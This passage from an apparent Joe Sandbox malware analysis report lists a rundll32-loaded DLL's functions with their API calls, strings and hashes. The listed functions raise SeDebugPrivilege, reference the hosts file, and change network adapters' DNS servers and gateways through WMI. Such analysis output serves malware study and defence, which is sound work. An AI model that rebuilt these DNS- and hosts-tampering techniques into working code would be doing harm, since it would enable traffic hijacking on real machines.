                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
                                                • Instruction ID: f44bec48cfd1db76282749f53c4335c8f231482f3a8341f8f54339fd7f20c475
                                                • Opcode Fuzzy Hash: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
                                                • Instruction Fuzzy Hash: 5EB092B4800620DBEA228F608CC840736A4A30C241310C801F910C3224D734C004DB60
                                                Function 10001710 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(033F5060), ref: 10001726
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
                                                • Instruction ID: 01a5768d41d78c628a35912e35f35776f9a67f167c5283b5b972b0fbab8e5750
                                                • Opcode Fuzzy Hash: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
                                                • Instruction Fuzzy Hash: A1B092B88005208BE612CB60898840B3675A30C2813008101FA10C3224E734C0009B20
                                                Function 10004C60 Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
                                                • Instruction ID: 915426f7239b9cb48ebf138ba431655957d97aef7f5178b11ca68321cf6e6836
                                                • Opcode Fuzzy Hash: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
                                                • Instruction Fuzzy Hash: C1A00275904610AFDE40DBE4DA8C81A77F8AB85712B00C845F146C3510D634D840DB11
                                                Function 10004890 Relevance: 1.5, APIs: 1, Instructions: 4networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: gethostbyname
                                                • String ID:
                                                • API String ID: 930432418-0
                                                • Opcode ID: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
                                                • Instruction ID: 26478d519f0170d2f3c1910e6c0f6e08a92a4de9d16a5e5f2b495c288a005660
                                                • Opcode Fuzzy Hash: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
                                                • Instruction Fuzzy Hash: 1EA00275908214ABDE00DBA5CA8C81E77E8BF85701B00C844F145C2110CA34D844DB51
                                                Function 10004A10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsA.SHLWAPI(?,1000BB9A,c:\agtve\ReadMe.txt,SeDebugPrivilege,00000001), ref: 10004A15
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID:
                                                • API String ID: 1174141254-0
                                                • Opcode ID: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
                                                • Instruction ID: ec750d28cb6fbb977bf46ecf5412cbf52607359abee085474d97c5188552acf2
                                                • Opcode Fuzzy Hash: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
                                                • Instruction Fuzzy Hash: F4A00275904210AFDF00DBF4CA8C81A77E8ABC5701B00C844F145C3110D674D850DB11
                                                Function 10004B30 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDriveTypeA.KERNEL32(10019D30,1000B666,10019D30), ref: 10004B35
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DriveType
                                                • String ID:
                                                • API String ID: 338552980-0
                                                • Opcode ID: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
                                                • Instruction ID: 9c3019adaafa634595d2db0f921d36bac7b56a2a79f4b30dc892680141a0bc5c
                                                • Opcode Fuzzy Hash: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
                                                • Instruction Fuzzy Hash: 74A002B5A04210ABDE00EBA5CB8C91A77FCAB89701B008845F549C2011C678DC40DB11
                                                Function 10021790 Relevance: 1.3, APIs: 1, Instructions: 37memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 100217ED
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
                                                • Instruction ID: 2c76a93c93dfa73a3cc5bc0969654cda5b929ba325a9910453c2048308b3be31
                                                • Opcode Fuzzy Hash: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
                                                • Instruction Fuzzy Hash: D9016D35E843289FDB61CF28CC087C8B7F1EB44351F6100A8E688B7285D7B5AE818E44

                                                Non-executed Functions

                                                Function 10006090 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • strrchr.MSVCRT ref: 1000610E
                                                • strncpy.MSVCRT ref: 10006125
                                                • strncpy.MSVCRT ref: 1000612F
                                                • GetSystemInfo.KERNEL32(?), ref: 10006139
                                                • GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 10006161
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
                                                • CloseHandle.KERNEL32(00000010), ref: 100061B2
                                                • sscanf.MSVCRT ref: 100061DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                                • String ID: %[^$SeDebugPrivilege$c:\agtve$etc\hosts
                                                • API String ID: 3677170833-1810064220
                                                • Opcode ID: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
                                                • Instruction ID: 40014daf93b6d2639d90dc8878842a3feb4d3ad8defe4510b3edf01b2d76c729
                                                • Opcode Fuzzy Hash: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
                                                • Instruction Fuzzy Hash: 403156B5904360AFE310DF65CDC9A6BBBE8FF8A310F40851AF645866A1D7B4D580CB62
                                                Function 10005A10 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 473COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcscat.MSVCRT ref: 10005B73
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 10005E38
                                                • _strcmpi.MSVCRT ref: 10005E55
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 10005F59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked$_strcmpiwcscat
                                                • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                • API String ID: 1133782235-2685825574
                                                • Opcode ID: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
                                                • Instruction ID: 0bcee575146c1e5c4bc0c3f0e2efc98e3102ad08c7b031823cab273adbecfb8d
                                                • Opcode Fuzzy Hash: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
                                                • Instruction Fuzzy Hash: F502C4715043469FE720DF64C884AAFB7E9FB88394F008A2DF5999B280DB75DD81CB52
                                                Function 10009640 Relevance: 16.9, Strings: 13, Instructions: 688COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: WHERE $DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$ROOT\CIMV2$SELECT * FROM $SetDNSServerSearchOrder$SetGateways$WQL$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
                                                • API String ID: 3448037634-1913130381
                                                • Opcode ID: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
                                                • Instruction ID: 422aa8304ea0dd682b4161e69f4c579d617248279d3008b81ee9107976b9911b
                                                • Opcode Fuzzy Hash: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
                                                • Instruction Fuzzy Hash: 02427F706083819FE364CB68C881B6BBBE4FF85384F10492DF599D7295DB70E949CB52
                                                Function 10006BF0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Versionsprintf
                                                • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                                • API String ID: 1728264858-2264339393
                                                • Opcode ID: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                • Instruction ID: 2420705a5d847b29da7bc657143dca2d79446832891e12a74f3d8b2563089a91
                                                • Opcode Fuzzy Hash: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
                                                • Instruction Fuzzy Hash: 7531E6357043445BF724C524C850AABB7D7F7C9360FA18B2EE95ACB384DA74DD098652
                                                Function 100052A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(?,?), ref: 10005333
                                                • wsprintfA.USER32 ref: 1000537B
                                                • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 100053E8
                                                • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 100053FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                • String ID: %s\%s$.$\*.*
                                                • API String ID: 180737720-2210278135
                                                • Opcode ID: 6158b02a40cfa1e8ece74248f2afa690ecc6b7e7278f8e02395cafd1e3e61bb4
                                                • Instruction ID: 2e1d4cd89514877abfd59c36d78a4daaf7955f10aa71ebe425ca93e7152c8260
                                                • Opcode Fuzzy Hash: 6158b02a40cfa1e8ece74248f2afa690ecc6b7e7278f8e02395cafd1e3e61bb4
                                                • Instruction Fuzzy Hash: B63117765043445BD328CA74CC45AEBB7D9FBC8360F144F1DF6A6832C1DEB5DA088652
                                                Function 10010400 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 619COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /$T$U
                                                • API String ID: 0-733984016
                                                • Opcode ID: 525556d3e7044afcf2c16f4ef111071ab16cb3c8bd6f93a204e44dd9c90e561f
                                                • Instruction ID: 54e231698d8399043daabedda60659547f47bf3691f9c67918a969528f04d64c
                                                • Opcode Fuzzy Hash: 525556d3e7044afcf2c16f4ef111071ab16cb3c8bd6f93a204e44dd9c90e561f
                                                • Instruction Fuzzy Hash: 6822E0357083848BD714CE2894907AFBBE1EFC5350F54492EF9C98B382DAB5D989C792
                                                Function 100100A0 Relevance: 3.1, APIs: 2, Instructions: 55timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?), ref: 100100D5
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 100100E5
                                                  • Part of subcall function 1000F800: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?), ref: 1000F80D
                                                  • Part of subcall function 1000F7D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000F7EC
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 568878067-0
                                                • Opcode ID: 3c7b63944ef902037c5997f2c77d2aef4e3869aed4e7be9e2536b261e6034266
                                                • Instruction ID: 995162f2c5de06f072ebb5dfe50ac0562f18bd270405066c96cf5d8846fcc540
                                                • Opcode Fuzzy Hash: 3c7b63944ef902037c5997f2c77d2aef4e3869aed4e7be9e2536b261e6034266
                                                • Instruction Fuzzy Hash: CB2192B5914B419FD364CF69C885A67BBE4FF88604F008E2EE5DAC3611E774E508CB51
                                                Function 1000EF70 Relevance: 2.9, Strings: 2, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K$P
                                                • API String ID: 0-420285281
                                                • Opcode ID: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                                • Instruction ID: d915cf7a3844b20744192fc994c5be6d907e7ce11dd85da2ee4327704e6dc918
                                                • Opcode Fuzzy Hash: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
                                                • Instruction Fuzzy Hash: 67D18D30119381AFD621CB698CC0EABFBF9AFDAB00F44490DF6D593291D6A1E5498762
                                                Function 1000EB80 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K$PTU
                                                • API String ID: 0-3860820754
                                                • Opcode ID: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                                • Instruction ID: 57dcef8c008dabf52abf9e4636a7a5e332a2cb07ba24af8fd2032e897ee0a7d3
                                                • Opcode Fuzzy Hash: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
                                                • Instruction Fuzzy Hash: AB91913011A3856EDB04DB688CC0E9BFBED9FD6704F04494EFA809B296D5E1D549CBB2
                                                Function 10004B90 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,1000718E), ref: 10004BAE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AdjustPrivilegesToken
                                                • String ID:
                                                • API String ID: 2874748243-0
                                                • Opcode ID: 5c29c102cc9c653389ecacc8ddbee5a51ee40a280c19b6b36d48fb2c7fee9579
                                                • Instruction ID: 4a3738c88aa3e83466f495a16826e8226183112536dd6560dab8ac3166fdef8a
                                                • Opcode Fuzzy Hash: 5c29c102cc9c653389ecacc8ddbee5a51ee40a280c19b6b36d48fb2c7fee9579
                                                • Instruction Fuzzy Hash: 50D06CF5208342AF9708CF48D984C3BB7E9BBC8600F048D0CB59683210C730E849CB62
                                                Function 100049F0 Relevance: 1.5, APIs: 1, Instructions: 6shutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitWindowsEx.USER32(?,00000000), ref: 100049FA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExitWindows
                                                • String ID:
                                                • API String ID: 1089080001-0
                                                • Opcode ID: a826d04bc4acaab0df248578ff412a1e3f22f76450817561718ce58b9e070933
                                                • Instruction ID: 6834376b89d028fd7ceef46dd2decc3cf13db427bf36252ff7f61f5970c34d6c
                                                • Opcode Fuzzy Hash: a826d04bc4acaab0df248578ff412a1e3f22f76450817561718ce58b9e070933
                                                • Instruction Fuzzy Hash: E2B092B4104200ABDA04CBA0C98493A77A8AB88200B00880CF48582210C630D841CA11
                                                Function 1000DB90 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
